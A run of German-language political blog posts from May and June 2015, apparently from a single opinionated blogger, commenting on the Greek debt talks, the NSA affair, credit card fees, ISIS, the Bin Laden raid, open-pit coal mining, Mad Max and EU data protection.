Diese Art von Parlament braucht niemand hier. Einfach mal ein paar Jahre ins Abklingbecken, dann können die auch nichts mehr mit ihrem Diplomatie-Getrampel noch schlimmer machen in Sachen Griechenland, und dann steht auch niemand einer Aufklärung beim NSA-Skandal im Wege.
Einwände?
Update: Die Regierung natürlich auch gleich mit ins Abklingbecken, falls das jetzt jemand nicht zwischen den Zeilen gelesen hat.

Mon Jun 8 2015

[l] Habt ihr das auch gehört? Griechenland kommt der Troika gar nicht entgegen?
Varoufakis erklärt mal die Situation.
Wir jedenfalls haben die Punkte, über die wir uns einig waren, aufgenommen und haben darüber hinaus in den strittigen Fragen Zugeständnisse gemacht. Das haben wir als Vorschlag vergangene Woche vorgelegt. Dagegen ist das, was Herr Juncker Ministerpräsident Tsipras mit Unterstützung von Kanzlerin Merkel und Präsident Hollande vorgelegt hat, nur wieder die Ausgangsposition, gerade so, als ob es nie Verhandlungen gegeben hätte.
Und das ergibt ja auch Sinn. Für die EU jetzt. Denn je länger die "Verhandlungen" dauern, desto länger zahlt Griechenland sinnlos Zinsen, ohne die Schulden reduziert zu kriegen.
Übrigens ist Varoufakis gerade in Berlin zu Besuch und hält einen Vortrag in der Hans-Böckler-Stiftung (da link ich lieber nicht drauf, der Stream ist jetzt schon ruckelig), wo er gerade erklärt hat, was da das Problem ist. Und zwar erklärt er, wenn man bei einer Währungsunion nicht die Drachme entwerten kann, dann senkt man eben die Lohnkosten. Und die Lohnkosten sind um 38% gefallen in Griechenland. Aber die Exporte sind nicht gestiegen. Das war aber die Theorie, die Begründung. Wenn wir die Löhne senken, sinken die Herstellungspreise, dann exportiert Griechenland mehr, und dann können sie ihre Schulden abzahlen. Funktioniert nicht.
Außerdem, und das ist ein Punkt, der bisher ein bisschen zu kurz gekommen ist, kommen weniger Steuern rein, aber die Schulden werden nicht weniger. Die kann das Land dann nicht bedienen und dann braucht es Bailouts und mehr Bailouts.

Sat Jun 6 2015

[l] Habt ihr das auch gehört? Die ganze Kohle, die Europa nach Griechenland abdrückt! Oh Mann, was wir da für ein Geld verlieren! Und alles zahlt der arme Steuerzahler!1!!
Hier die Realität:
Die häufig gestellte Frage, was die Griechenlandhilfe die deutschen Steuerzahler bisher gekostet hat, ist schnell beantwortet: Nichts. […] Teuer wird es erst, wenn Griechenland pleitegeht und die Kredite nicht mehr bedienen kann. Bis dahin verdient der Bundesfinanzminister sogar an der Griechenlandrettung: Seit 2010 hat er aus Athen Zinsen in Höhe von 360 Millionen Euro bekommen.
Ja, aber, aber … die faulen Griechen! Die unser ganzes Geld kriegen, ohne dafür was geleistet zu haben!1!!
Das wirft die Frage auf: Was haben die Griechen mit den Milliarden gemacht? Die Antwort: Gar nichts. Denn die meisten Hilfsgelder kamen nie in Griechenland an.
Für aufmerksame Blogleser ist das jetzt keine Überraschung, aber man muss in solchen Dingen ja immer wiederholen, damit die Leute nicht den Wiederholungen der Lügen glauben.

Mon Jun 1 2015

[l] Der Patriot Act ist ausgelaufen. Rand Paul hatte mit seinem Filibuster Erfolg, bzw mit noch einem anderen Trick, den Cloture-Regeln im Senat. Aber alleine die Tatsache, dass ein libertärer Spinner wie Rand Paul am Ende den Schritt gemacht hat, sagt uns mehr als deutlich, dass das wohl eher nur temporär so sein wird.

Sat May 30 2015

[l] Noch ein paar Updates zu der Kreditkartengeschichte. Erstens eine Mail, die dazu reinkam:
1,5%? neee 3-7% für den Einzelhandel, so tolle Konditionen mit 1,5% bekommen nur Ketten wie Rewe, Autovermieter und Fluglinien. Bei EC-Kartentransaktionen sind die Gebühren bei <0,5% selbst für kleine Transaktionen.
In Schweden nimmt es schon mafiöse Ausmaße an, weil die kein zu EC vergleichbares System haben sondern VISA den ganzen Markt in der Hand hat. Ein Kioskhändler sagte mir mal, 15% müsse er abdrücken.
Wer das ganze System mal verstehen will, dem sei dieser Foliensatz von Lucky Green empfoheln, von dem ich mal einen PDF-Export gemacht habe.
Behaltet diese ganzen Zusammenhänge bitte im Hinterkopf, wenn ihr Kampagnen wie aktuell mal wieder "wir brauchen doch eigentlich gar kein Bargeld mehr" seht. Gerne auch als "Bargeld hilft nur Verbrechern" verkleidet. Dreimal dürft ihr raten, wessen Lobbyisten da dahinter stecken.
Update: Einen hab ich noch:
ich habe bei ~1Mio Umsatz über Karte pro Jahr 1.95% für Visa/Master, 0.3% bei EC und zahle 13€ pro Monat pro Terminal (Miete + Grundgebühr). 3% habe ich noch nie gehört, finde ich irre viel. Habe damals neu bei 2.75% angefangen.

Thu May 28 2015

[l] Duncan Campbell war überraschend auf einer Geheimdienstler-Veranstaltung als Redner eingeladen und erzählt mal ein bisschen. Wer Duncan Campbell nicht auf dem Rader hat: Der war hier schon häufiger im Blog und ist einer der wichtigsten investigativen Journalisten Europas. Der Mann hat die Existenz von Echelon aufgedeckt.
Wer Echelon nicht auf dem Radar hat: Das ist das System, vor dem wir alle Angst hatten, bevor Snowden uns erzählt hat, was die Amis noch so machen. Wikipedia dazu. Das gipfelte am Ende in einem Report, den die EU anfertigen ließ, und den Duncan ausgearbeitet hat. Der Report hieß Intercaption Capabilities 2000 und hat großen Wind gemacht damals. Wir hatten Duncan Campbell 1999 auf dem 16C3 zu Besuch, wo er uns das in Ruhe erklärt hat. Danach konnten viele von uns nicht mehr so gut schlafen. Das war damals so der Snowden vor Snowden.
Und DEN laden die zu ihrem Geheimdienstlertreffen ein? Wo er eine Podiumsdiskussion zusammen mit dem neuen GCHQ-Direktor Robert Hannigan eröffnen durfte?
Wie sich die Zeiten doch ändern!
Aber auch ohne diese ganzen Hintergrund ist das natürlich hochspannend, was die Leute sich da gegenseitig zu erzählen haben, und wie so die Stimmung ist nach Snowden.

Mon May 25 2015

[l] ISIS hat sich zu einem Bombenanschlag auf eine Moschee in Saudi-Arabien bekannt.
Das ist deswegen wichtig, weil ISIS eine sunnitische Terrorgruppe ist, und Saudi Arabien häufig vorgeworfen wird, sie hätten Al Kaida und ISIS finanziell gefördert, unter der Voraussetzung allerdings, dass die ihren Terror anderswo machen und nicht in Saudi Arabien. Ich empfehle dazu die Adam-Curtis-Dokumentationen.
Wenn sich jetzt also rausstellt, dass ISIS sich nicht an den Deal hält und trotzdem in Saudi Arabien rumbombt, dann könnte das heißen, dass Saudi Arabien die Seiten wechselt und bei der "Koalition" mitbombt.
Übrigens hat auch der Hisbollah-Führer Nasrallah eine Rede zu ISIS gehalten. Die Hisbollah ist ja eine schiitische Miliz, der Israel vorwirft, sie würden vom Iran finanziert. Saudi Arabien und ISIS sind sunnitisch. Die Hisbollah macht sich gerade Sorgen, dass sie zwischen ISIS und Israel aufgerieben werden könnte, und ruft zum Kampf gegen ISIS auf. Sie können sich aber den einen oder anderen Seitenhieb auf Israel nicht sparen und sagen auch, die Koalition habe in einem halben Jahr weniger Luftschläge gegen ISIS gemacht als Israel gegen den Gaza-Streifen.
Bei der Gelegenheit wundere ich mich gerade, dass ich gar nicht weiß, ob Israel eigentlich bei der Koalition gegen ISIS dabei ist. Weiß das jemand? Bomben die da mit?
Update: Konsens der Einsender ist, das Israel (noch) nicht bei der Anti-ISIS-Koalition mitbombt.

Sat May 23 2015

[l] Ein Mitarbeiter der Bank of England hat die geheimen Brexit-Pläne versehentlich an den Guardian gemailt. Inklusive PR-Anweisungen, wie man die Existenz dieses Plans am besten leugnet. Einmal mit Profis arbeiten!
Update: Freudscher Vertipper korrigiert.
[l] Ein Mitarbeiter der US-Botschaft in London soll monatelang von seinem Arbeitsplatz-Rechner aus Sex-Erpressungen durchgeführt haben. Der schrieb Frauen an, behauptete, er habe von ihnen Nacktfotos, und forderte Geld. Und das hat der von seinem Arbeitsplatzrechner aus gemacht. Über Monate.

Thu May 21 2015

[l] Hier kommt gerade ein Linktipp herein, bei dem der Kommentar mir wichtiger ist als der Link selbst. Der Link geht zu dieser Story, dass die HUK-Coburg ihre Tarife an das Fahrverhalten anpassen will. Das hat der CCC jahrelang als Horrorszenario an die Wand gemalt, langfristig mit Gesundheitsdaten, kurzfristig mit Fahrverhalten. Insofern: Scheiße, dass wir bei sowas immer Recht haben.
Aber jetzt zum Kommentar in der Mail. Den finde ich so wichtig, weil mir genau solche Gedanken bei solchen Meldungen auch durch den Kopf gehen.
Schön langsam habe ich keine Lust mehr im IT Sektor zu arbeiten, wenn ich solche Meldungen lese.
Ich trage zwar keine direkte Schuld daran, dass sowas implementiert wird, bin jedoch eines der kleinen Rädchen, die dafür verantwortlich sind, dass die Infrastruktur läuft, die derartige Sachen ermöglicht!
Erinnert mich irgendwie an meinen Großvater…der war während des 2. WK Mitarbeiter bei der Bahn….er hat zwar keinen persönlich in die Güterwägen verfrachtet, war aber, als kleines Rädchen, dafür verantwortlich, dass die dann pünktlich angekommen sind!
Ich möchte nicht einmal mit 80 meinen Enkelkindern sagen, dass auch ich mitgeholfen habe!
Mir ist klar, dass die Qualität meiner Mithilfe eine andere ist, als die meines Grossvaters….aber wenn ich derartige Meldungen lese und dann die Veränderungen der letzten Zeit in die Zukunft interpoliere, dann hoffe ich, dass ich einer der Pessimisten bin!
Schade eigentlich…ich war halt immer derjenige, der der Meinung war, dass der technische Vortschritt UNS zugute kommt!
Ihr glaubt gar nicht, wie es mich freut, dass sich auch andere Menschen derartige Gedanken machen, und sie mit mir teilen!
Ich glaube, wir müssen mal langsam anfangen, Schranken zu definieren, an welchen Projekten man nicht mitarbeiten darf, um sich nicht mitschuldig zu machen. Ich für meinen Teil mache nicht mit bei Machine Learning und Big Data. Das ist besonders schmerzlich, weil ich Machine Learning mal studiert habe und nach wie vor hochinteressant finde. Aber wenn man da mitmacht oder gar den Stand der Technik voranbringt, ermöglicht man militärische und unterdrückungsstaatliche Anwendungen, die man karmatechnisch nie wieder ausgewetzt kriegt.
Update: Lest mehr Joseph Weizenbaum!
[l] Kann mir eigentlich mal jemand erklären, wieso die Nahles nichts von dem GdL-Ärger abgekriegt hat?
Wenn wir mal Revue passieren lassen, wie es zu dieser Streikpanik kam, dann liegt das an Frau Nahles. Die hat das Gesetz gegen die GdL zu verantworten. Das Gesetz ist nicht nur ein offener Verfassungsbruch, es ist auch explizit darauf ausgelegt, die GdL zu marginalisieren. Oder sie unter Zugzwang zu setzen, mehr Streiks zu machen, um am Ende einen besseren Abschluss als die Konkurrenz rauszuholen, um populärer als die Konkurrenz zu werden. Denn das Gesetz sieht vor, dass nur noch der Tarifvertrag der Gewerkschaft mit den meisten Mitgliedern gilt. Damit sind alle anderen Gewerkschaften raus. Die GdL musste jetzt also dringend etwas tun, um populärste und mitgliedsstärkste Gewerkschaft bei der Bahn zu werden.
Und nicht nur war das von Anfang an sonnenklar, das war explizit darauf ausgelegt. Denn die Medien schrieben von Anfang an: Wenn ihr dieses Gesetz macht, dann wird es mehr GdL-Streiks geben. Die haben nicht mal geblinzelt. Die haben das Gesetz gemacht. Daraus folgt, dass sie das so haben wollten.
Wahrscheinlich in der Hoffnung, dass die Bevölkerung dann einen Hass auf die GdL entwickelt. Und ist die Bevölkerung nicht willig, helfen die Hassprediger von "Bild" und co.
Und genau so ist es ja auch gekommen.
Aber für die Geschichtsbücher wollen wir mal festhalten: Dieser Streik war von der Politik gewollt und gesetzlich erzwungen. Wenn hier jemand dafür auf die Fresse kriegen sollte, dann die Bundesregierung.

Mon May 18 2015

[l] Zitat aus einer Mail:
pünktlich zu deiner „China spart tonnenweise CO2 ein“ - Meldung, war ich gestern mit Freunden mal den Tagebau Hambach (http://de.wikipedia.org/wiki/Tagebau_Hambach) im Rheinland besichtigen und ich bin sehr negativ überrascht. Klar man kennt den Tagebau und die gigantischen Bagger aus dem Fernsehen von diversen Dokumentationen aber welche Ausmaße das wirklich hat, konnte ich mir so nicht vorstellen (und ich kann es immer noch nicht ganz fassen). Exemplarisch dazu ein Bild von mir https://www.flickr.com/photos/dl7tny/17809072071/in/datetaken/ welches ich von einer der Aussichtsplattformen (sick!) gemacht habe.
Um die Größenverhältnisse mal einordnen zu können… die Absetzer die Rechts im Bild den Abraum abwerfen sind ca 4500 Tonnen schwer (Details siehe u.a. http://www.eifelmomente.de/sommer/95-3082009-grosse-reportage-umzug-absetzer-756-und-impressionen-vom-tagebau-hambach - nicht meine Seite!) und die Bagger wiegen ca. 14.000 Tonnen und sind über 90m hoch (siehe http://de.wikipedia.org/wiki/Bagger_287). Und man sieht wie klein das alles auf den Bildern ist…
Ich bin nun nicht unbedingt Öko Aktivist, aber so ein Anblick gibt mir dann doch zu denken. Das alles für einen historischen und semi-idealen Brennstoff (siehe https://www.energie-lexikon.info/kohle.html), der nur noch von Lobbyinteressen gebraucht wird, weil man Strom heute mMn sinnvoller erzeugen kann. Ich kann jedem nur empfehlen sich diese Zerstörung anzuschauen, denn kein Bild und kein Film kann das so imposant wiedergeben.
Und in der Tat, die Größe der Zerstörung kann man auf Google Maps ganz anschaulich sehen. Im Osten Deutschlands würde man wohl bei Spremberg gucken. Was da jetzt wie eine schnuckelige Seenlandschaft aussieht, sieht auf der Übersichtskarte hier wie die stillgelegten Tagebaugebiete aus.
Update: Whoa, sogar auf einem Satellitenbild von fast ganz Deutschland kann man die Tagebaugebiete noch sehen. SO VIEL SCHADEN machen wir Menschen da!

Sun May 17 2015

[l] Ich habe gestern Mad Max im Kino geguckt. Ich glaube, wer auf diese Art von Randgruppen-Film nicht steht, guckt den auch gar nicht. Anders kann ich mir jedenfalls nicht erklären, wie der 90% positive Kritiken einfahren konnte.
Im Wesentlichen fahren den Film über ausgemergelte verstrahlte Post-Atomkrieg-Leute in bizarren Endzeit-Gefährten durch die Wüste, und bekämpfen sich mit einer Mischung aus Lanzen, antiken und modernen Schusswaffen, und Kettensägen. Von der Optik her ist der Film grandios, wenn man auf Wüsten und Sandstürme und so steht. Für die Karossen haben sie offenbar monatelang Schrottplätze geplündert, um das irgendwie zusammenschrauben zu können. Wo jetzt genau die Munition und das Benzin herkommt, bleibt so ein bisschen unklar. Aber immerhin gibt es auch am Rande das Gefühl, dass das knappe Ressourcen sind.
Es gibt einen Plot, den man vielleicht mit ein paar Filmklischees beschreiben könnte, aber das spare ich mir hier mal. Die üblichen Endzeit-Tropes ala Sünden, Erlösung, Halluzinationen, bekloppte religiöse Kulthandlungen, etc. sind alle vorhanden.
Wenn ich den Film zusammenfassen sollte, dann ist es eine Orgie aus Stunts. Zwei Stunden lang ein Stunt nach dem nächsten. Erfrischend wenig CGI. Die Stunts sind durchweg beeindruckend und setzen Maßstäbe. Und der Plot hat dann auch tatsächlich sowas wie eine überraschende Wendung, über die man danach sogar ein bisschen nachdenkt.
Aber wenn ich rückblickend begründen müsste, wieso ich den Film jetzt gucken musste, könnte ich es nicht wirklich sagen. Auch wenn das ganze spannend ist, fühlte ich mich nicht mitgerissen.
Fazit: Kann man sich auch auf Bluray aus der Videothek angucken.
Update: Mhh, also irgendwie beschäftigt mich der Film doch mehr, als ich gedacht hätte. Und ich habe jetzt den Eindruck, dieser Review war doch zu negativ. Denn der Film ist handwerklich hervorragend gemacht und ein bemerkenswerter Trip. Aber kein Trip, aus dem man am Ende betäubt rauskommt. Eher einer, aus dem man am Ende rauskommt, und sich dann zwei Tage lang fragt, was einem da eigentlich gerade geschehen ist. Daher jetzt doch Kino-Empfehlung. :-) Besser als irgendein Film, bei dem man den Plot die ganze Zeit kommen sieht, ist es allemal. Und es ist schon erfrischend anders, dass einem hier der Plot weder wie in Independence Day als völlig ausweglos reingedrückt wird, sondern es bleibt die ganze Zeit der Eindruck, dass auch den Figuren selber nicht völlig klar ist, ob das eigentlich richtig ist, was sie da tun. Das kann man schon als Allegorie auf unser Leben betrachten irgendwie.
Update: Hier gibt es eine sehenswerte Filmkritik zu Mad Max.
[l] In nur ein paar Monaten hat China über 1000 Kohle-Kraftwerke zugemacht, um ihre CO2-Emissionen zu senken. Jetzt emittieren sie ungefähr soviel CO2 wie Großbritannien. Wie Großbritannien!! Wow.
Update: Oops, verlesen. Sie haben nicht auf das Niveau von Großbritannien reduziert, sondern um das Niveau von Großbritannien. Weniger doll aber immer noch wow :-)
[l] Wichtiger Hinweis für Kanada-Touristen: Keine Street-Art-Fotos machen.
In dem Fall geht es um eine Frau, die ein Foto von einem Graffiti-Bild gemacht hat, auf dem man einen Polizisten sehen konnte, der ein blutendes Schussloch in der Stirn hat. Es handelte sich — was die Frau nicht wusste — um den Polizeisprecher. Sie hat das Foto bei Instagram hochgeladen. Dort sah es wohl die Familie von dem Polizisten. Und der klagte dann.
Ergebnis: 18 Monate auf Bewährung und 100 Stunden Community Service.
Sie hat das Graffiti nicht gemacht, nur ein Foto davon gemacht.
Update: Mhh, vielleicht waren das auch gar keine 18 Monate Haftstrafe sondern die Bewährungsfrist war bloß 18 Monate? Die drohende Höchststrafe ist nämlich bloß 6 Monate Haft. Hier gibt es ein paar mehr Details, die die Sache in anderem Licht erscheinen lassen.
Pawluck later added the hashtags “Un flic, une balle” (one cop, one bullet) and “All Cops Are Bastards” and made sure to get the spelling of Lafrenière’s name right (she had to correct it once). She also added a hashtag linking it to Montreal police social media pages.
Das kann also nicht stimmen, wenn die andere Story sagt, sie habe den Mann gar nicht gekannt.

Thu May 14 2015

[l] US-Army-Konvoy verfährt sich auf dem Weg zum Nato-Maneuver in Polen in Brandenburg. Sagt mal, wie haben die denn das früher bitte gemacht? Als es noch kein GPS gab? Wenn die sich schon mit GPS verfahren!?
Apple Maps? (Danke, Heiko)
[l] So langsam kann man an der HU nur noch mit ausgeprägter Masochismus-Neigung Professor sein. Guckt mal hier. Money Quote:
Hier gelang es auch, die Urheber der Hetzkampagne zu benennen: die Jugendorganisation der trotzkistischen Partei für soziale Gleichheit.
Trotzkisten-Jugend, ja?
Übrigens hat RT zu den britischen Polizeistaatsgesetzen neue Details und auch dort gibt es einen Gender-Winkel:
These measures will focus on reducing the presence of those who incite hatred against gender, race or religion on social media and in print.
Damit ist ja dann wohl auch klar, von wem keine Gegenwehr kommen wird. Und an sich ist das echt nicht doof gemacht, denn wer kann da schon dagegen sein, dass mal jemand was gegen diese fiesen Hassprediger unternimmt!1!! Und die Vorzensur gilt ja auch nicht immer und für alle, sondern nur für Leute, die schonmal negativ aufgefallen sind. Die Details obliegen der Diskretion der Polizei.
They will also target those who perpetrate harmful activities for the “purpose of overthrowing democracy.”
Also mit anderen Worten: Demonstranten.
Ich glaube ja, dass hier die gleichen Mechanismen greifen, die überhaupt erst zur Wahl von so Leuten die Cameron führen, die für die 1% Politik machen und den Rest in die Gosse treten. Das ist der Amerikanische Traum. Diese völlig irrationale Idee, man könne ja irgendwann zu den Besserverdienenen gehören. Die Idee, die dazu führt, dass Leute Multimedia-Startups in Berlin gründen, sich dann zehn Jahre für teilweise weniger als Hartz IV den Rücken krumm arbeiten. Und dann aber gegen die Vermögenssteuer ab 1 Million sind, weil sie ja auch irgendwann Vermögen haben könnten. Ja nee, klar.
Und genau so läuft das hier glaube ich auch ab. Die Leute leben unter der irrationalen Wahnvorstellung, das Gesetz werde schon nur gegen die Bösen angewendet werden, nicht gegen sie. Sie haben ja nie was böses getan. Wieso würde jemand sie plattmachen wollen? Das merkt man halt erst, wenn man wie ein Fußballfan gekleidet Bahn fahren will. Oder wenn man bei einer Demonstration rausgegriffen wird.
Leute, ihr müsst da mal anders herum drangehen. Wenn das Gesetz auf euch angewendet werden könnte, dann ist es auch für genau dafür gemeint. Und wie weit die Politik da mit kreativer Wortauswahl und -umdefinition geht, das kann man ja gerade prima beim NSA-Skandal sehen.

Mon May 11 2015

[l] Der Bayerischen Wirtschaft geht es schlecht.
Warum? Weil Österreichische Taxen nicht mehr über die Grenze fahren.
Warum? Weil die ~~deutschen~~ bayerischen Behörden einen Taxifahrer wegen "Schlepperei" festgenommen haben. Wie krass ist DAS denn bitte?! Schlepperei?! Ist das jetzt Aufgabe des Taxifahrers, … ja was eigentlich? Papiere kontrollieren? WTF?!
Update: Das hat an dieser Grenze Tradition, wie ich gerade erfahre.
Am 7. Juni 1986 kam es bei einer nicht genehmigten Demonstration am Bauzaun erneut zu schweren Auseinandersetzungen zwischen 30.000 Demonstranten und 3.000 eingesetzten Polizisten. Etwa 400 Personen wurden verletzt, mindestens 50 mussten ärztlich versorgt werden. Die Polizei nahm 48 Demonstranten fest. Aus Österreich anreisenden WAA-Gegnern verweigerte die bayerische Regierung den Grenzübertritt. Am 29. Juni wurden erneut österreichische Kernkraftgegner an der Einreise gehindert.
Update: Das haben die Dänen übrigens auch schon mal mit deinem deutschen Taxifahrer gemacht. (Danke, Michael)
[l] Noch ein Hinweis zum Kriegsende:
Ach ja, wenn du dabei bist, wer hat eigentlich die Japaner besiegt? Was war eigentlich der Hauptschauplatz vom Pazifikkrieg? Doch nicht irgendwelche Inseln, die von Amerika heldenhaft als Kolonie zurückerobert wurden? Nein: China.
http://de.wikipedia.org/wiki/Zweiter_Japanisch-Chinesischer_Krieg
Deshalb sind auch ca. 90% der gefallenen Japaner in China gefallen, und nicht durch die Hand von Amerikanern. Der Pazifikkrieg wird gerne vergessen, gerade, wenn jetzt alle sagen "am 8. Mai 1945 endete der 2. Weltkrieg". Vor September haben die Japaner aber nicht kapituliert. Und die haben in China fast so viele Leute auf dem Gewissen wie Deutschland in Russland.
Warum das nicht? Ja, die blöden Chinesen haben halt kurz nach dem Krieg eine kommunistische Revolution gemacht. Solche abtrünnigen Ketzer kann man doch nicht erwähnen!
[l] Scheiße, ich habe einen Link verlegt. Heute morgen las ich ihn, und jetzt finde ich ihn nicht mehr. Vielleicht findet ihn ja einer von euch. Es ging darum, wer eigentlich Nazi-Deutschland besiegt hat. Es gibt da eine aktuelle Yougov-Umfrage, ist auch recht unterhaltsam ist. Aber der eigentliche Punkt des Links, den ich jetzt nicht mehr finde, war, dass sie eine Umfrage von 1945 mit der aktuellen verglichen haben. Es handelt glaube ich von Frankreich.
Und die Ergebnisse waren sowas wie:
1945: 60% sagen, die Russen hätten Hitler besiegt, 20% sagen, die Amis.
2015: 60% sagen, die Amis hätten Hitler besiegt, 20% sagen, die Russen.
Und das, meine Damen und Herren, ist eine exzeptionell gut laufende Propaganda-Maschinerie. Wenn den Link jemand findet, bitte ich um Zusendung. Übrigens sind in der aktuellen Umfrage selbst in Deutschland die Werte krass falsch. Da sagen 37% USA, 27% die Sowjetunion, und 2% die Briten.
Update: Da ist der Link! Danke an die vielen Einsender!
Update: Sputnik hat auch mal eine Umfrage gemacht :-)
[l] Habt ihr das auch gehört? Die Amis haben Osama bin Laden in seinem Versteck in Abottabad gefunden, mit zwei gezielten Stirnschüssen umgelegt, und dann seine Leiche schnell seebestaatet? Ja?
Wie sich rausstellt, war das ein Fall für Radio Eriwan. Der einzige wahre Aspekt daran ist, dass Bin Laden in Abottabad war.
Die Pakistanis wussten nichts? Bullshit. Die Pakistanis hatten Bin Ladens Leibarzt angeworben und haben Bin Ladens Aufenthaltsort an die Amis verkauft, als Obama im Wahlkampf Hilfe brauchte.
Das mit den Impfungen? Erstunken und erlogen. Um den Leibarzt zu vertuschen. Da sterben jetzt also regelmäßig Impfhelfer des Roten Kreuz und von anderen Organisationen, weil die Amis eine Spionage-Legende zurechtlügen mussten.
Die Amis hatten den Pakistanis ursprünglich erzählt, sie würden daraus einen Drohnenschlag machen, und dann haben sie nicht nur ein "Folter funktioniert" in die Story mit reingelogen, weil es sich gerade anbot, um andere Foltergeschichten zu untermauern, die spontan ohne eigenes Fundament dastanden.
Es gibt auch eine Erklärung dafür, wieso Bin Laden unbewaffnet war. Er war dort in Gefangenschaft des ISI, des pakistanischen Geheimdienstes. Mit dem hatten die Amis dann auch einen Deal gemacht, damit sie ihre Seals heldenhaft einfliegen können, ohne dass die Pakistaner sie abschießen.
Die heldenhaften Seals haben also heldenhaft bin Laden in seiner Zelle ermordet. Wisst ihr, woran mich das erinnert? An Dick Cheney auf seiner "Wachteljagd". Falls das jemand nicht kennt: Lewis Black erklärt Wachteljagd.
Oh und Bin Laden war bettlägerig. Leider sagt er nicht, was mit der Leiche passiert ist.
Wieso würden die Pakistaner denn Bin Laden überhaupt da rumgammeln lassen und niemandem was sagen? Weil das profitabel war! Saudi Arabien hat dafür gezahlt. Genau wie sie Al Kaida finanziert haben. Damit deren Terror bitte schön außerhalb von Saudi Arabien bleibt.
Achtung: Sehr langer Artikel.
Update: Da steht doch was über seine Leiche. Dass sie die Fetzen über dem Hindukusch abgeworfen haben.

Sun May 10 2015

[l] Aktuelles Gema-opfer: Ein singender Seniorenzirkel. Money Quote:
Es sei nicht ausgeschlossen, dass die zum Teil dementen Damen mit ihrem Gesang Urheberrechte verletzten.
Woher weiß denn die Gema, dass da Senioren singen? Na mit NSA-Methoden, ist doch klar! Big Data!
Auf die Schliche gekommen ist die Gema dem Seniorenkränzchen durch die systematische Auswertung von Zeitungsmeldungen. Nach Angaben von Gema-Sprecherin Gaby Schilcher werten Mitarbeiter des Vereins täglich „Tausende solcher Meldungen“ aus.
Dieser eiternde Stachel im Fleisch unserer Gesellschaft muss endlich zugemacht werden. Wie alle anderen Geheimdienste auch.

Thu May 7 2015

[l] Ich habe ja normalerweise meine Limits, was für Verschwörungstheorien und Schmutzwerfnummern ich hier bringe, aber manchmal ist gar nicht die Theorie selber der Punkt, sondern wer sie kolportiert. In diesem Fall kolportiert die "Zeit", Putin sei in Wahrheit Georgier und verleugne seine echten Eltern. Die "Zeit"! Gut, seit der Nummer mit der Anstalt haben die ja eh verloren. Aber DAS hier, boah. Also echt mal. Hatten die sich nicht damals über die "Obama ist gar kein Amerikaner"-Vorwürfe lustig gemacht? Und jetzt bringen die sowas?!
Krass.
Schlammloch-Journalismus. Nee, schlimmer. Die wühlen da ja offen in der Kloake. Rieselfeld-Journalismus? Ich weiß nicht. Gibt es da überhaupt ein Wort? Boah, was für ein Absturz.
[l] Wow. Ich hatte ja neulich kurz angesprochen, dass einige abgebliche Feministen in der US-Presse herumwimmern, Avengers sei nicht anti-sexistisch genug. Jetzt sehe ich gerade dieses Collage der menschlichen Wärme, die jemand aus Twitter-Kommentaren an Joss Whedon gebaut hat. Wow!
Heilige Scheiße.
Also da bin ich mir doch glatt sicher, dass das den elenden Shitlord Joss Whedon umstimmen wird, endlich Frauen mehr Zeit einzuräumen und ihnen mehr wichtige Rollen zu geben!
Inhaltlich bleibt vielleicht noch zu erwähnen, dass nicht nur eine weitere starke weibliche Hauptfigur eingeführt wurde in Person von Scarlet Witch, sondern dass Scarlett Johansson auch während der Dreharbeiten schwanger war (die Geburt war im September 2014). Im Übrigen sind alle Figuren, die noch mehr Screen Time gekriegt haben, am Ende tot oder nicht mehr Teil der Avengers.
Wer sich denkt: Hey, so eine Lavine aus Undankbarkeit und menschlicher Abgründe, da hätte ich ja erstmal meinen Twitter-Account zugemacht! Genau das hat Joss Whedon getan.

Wed May 6 2015

[l] Wollt ihr wissen, was Deutschlands bekanntester Technikphilosoph über die Selektoren zu sagen hat? Nicht? Egal, verlinke ich trotzdem :-)
Da werden gerade in Sachen Cybersicherheit oft Entscheidungen getroffen, die unzulässig und falsch sind. Man traut sich wegen der Geheimhaltungspflicht nicht, externe Expertise einzuholen, und von der Industrie wird man oft total verarscht. Es wird nicht richtig nach oben berichtet, weil man Angst hat, irgend etwas falsch gemacht zu haben und der nächsten Sparrunde zum Opfer zu fallen – Behördenabläufe halt. Und in diesem Punkt hat die Bundesregierung auch Recht mit ihrer Kritik an organisatorischen und technischen Defiziten des BND.
Seht ihr? Alles ganz harmlos. Ein paar inkompetente Beamte halt. Das kann im Eifer des Gefechts schon mal passieren, dass man versehentlich für einen ausländischen Geheimdienst die eigene Industrie ausspioniert! Da können doch die Beamten vor Ort nichts dafür!? Die haben lediglich Befehle befolgt (eine Ausrede mit Tradition in diesem Lande!)
[l] Neulich gingen hier ein paar Fragen einer Journalistin von Burda ein. Ich veröffentliche sowas ja immer parallel auch hier im Blog, insofern wartete ich gespannt darauf, dass da mal was veröffentlicht werden würde, habe aber nichts gesehen. Daher haue ich das jetzt halt hier im Blog raus.
Ist der deutsche bzw. europäische Datenschutz aus deiner Sicht innovationsfeindlich?
Nein, im Gegenteil.
Er wird europäischen Startups einen Marktvorteil verschaffen, wenn sie willens sind, Lösungen zu ersinnen, die die Privatsphäre schützen, während in Übersee nur an möglichst vollständiger Auswertung der Daten gearbeitet wird.
Wie glaubst du wird die neue EU-Datenschutzverordnung, sollte sie denn irgendwann in Kraft treten, die IT-Branche verändern?
Ich hoffe zum Besseren.
Im Moment sind die Internet-Geschäftsmodelle alle auf möglichst vollständige Erhebung aus Auswertung der privaten Daten der Benutzer ausgelegt.
Die Benutzer sind die Ware, nicht die Kunden.
Das kann eigentlich nur besser werden, wenn wir eine Datenschutzverordnung kriegen, selbst wenn die eher mittelmäßig bis schlecht ist.
Welche Bereiche müsste sie sinnvollerweise regulieren? Wo geht die aktuelle Diskussion über Datenschutz womöglich an der Realität vorbei?
Hier gibt es ein paar Fragen der Weltanschauung zu klären.
Wenn der Markt sich so entwickelt, dass man Dinge "kostenlos" kriegt, aber dafür seine Datenhoheit verliert, und die Menschen das mit sich machen lassen — ist der Staat dann in der Pflicht, die wehrlosen Bürger vor sich selbst zu schützen oder fällt das in die Verantwortung der Bürger? Betrachten wir die Datenweitergabe wie Rauchen und schützen die Bürger vor sich selbst und zum Beispiel den Verlockungen der Werbung? Ich halte das für unausweichlich. Gegenbeispiele gibt es kaum. Egal ob Flugzeuge, Autos, Schwimmbäder, Jahrmarkt-Attraktionen, Glücksspiel, Alkoholverkauf, Wendeltreppen, … wenn es von Menschen gemacht ist, dann sind der Hersteller und der Aufsteller in der Haftung und können sich nicht einfach damit rausreden, dass der Kunde ja hätte sehen können, dass an der Treppe kein Geländer war, und er selber Schuld ist, dass er runterfiel und sich das Bein brach.
